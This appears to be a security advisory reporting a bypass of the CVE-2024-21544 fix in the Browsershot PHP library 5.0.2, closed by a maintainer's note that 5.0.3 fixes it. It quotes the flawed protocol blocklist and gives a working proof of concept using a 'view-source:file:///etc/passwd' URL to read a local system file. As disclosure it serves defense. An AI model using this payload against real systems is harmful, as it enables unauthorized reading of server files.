Bypass for CVE-2024-21544

[nightfury99]

Description

Browsershot version 5.0.2 allows an external attacker to remotely obtain arbitrary local files. This is possible because the application does not validate the URL protocol passed to the Browsershot::url method.

Vulnerability

Affected versions (5.0.2) of this package are vulnerable to Improper Input Validation due to incorrect URL validation via the setUrl method. This is a workaround for previously patched CVE (CVE-2024-21544) by utilizing 'view-source:file://', which allows for arbitrary file reading on a local file.

Below is affected code: https://github.com/spatie/browsershot/blob/main/src/Browsershot.php#L260C1-L268C10

    public function setUrl(string $url): static
    {
        $url = trim($url);

        $unsupportedProtocols = ['file://', 'file:/', 'file:\\', 'file:\\\\'];

        foreach ($unsupportedProtocols as $unsupportedProtocol) {
            if (str_starts_with(strtolower($url), $unsupportedProtocol)) {
                throw FileUrlNotAllowed::make();
            }
        }

        $this->url = $url;
        $this->html = '';

        return $this;
    }

Exploit

1. We will create a POC on any file, in this case index.php.

<?php

require 'vendor/autoload.php';
use Spatie\Browsershot\Browsershot;

Browsershot::url('view-source:file:///etc/passwd')->save('my_screenshot.png');

2. Execute the php file.

php index.php

3. Successfully read /etc/passwd.
   

References

• https://fluidattacks.com/advisories/eminem/
• https://github.com/spatie/browsershot
• https://github.com/spatie/browsershot/blob/main/src/Browsershot.php
• https://vicevirus.github.io/posts/CVE-2024-21544/

[freekmurze]

This has been fixed in 5.0.3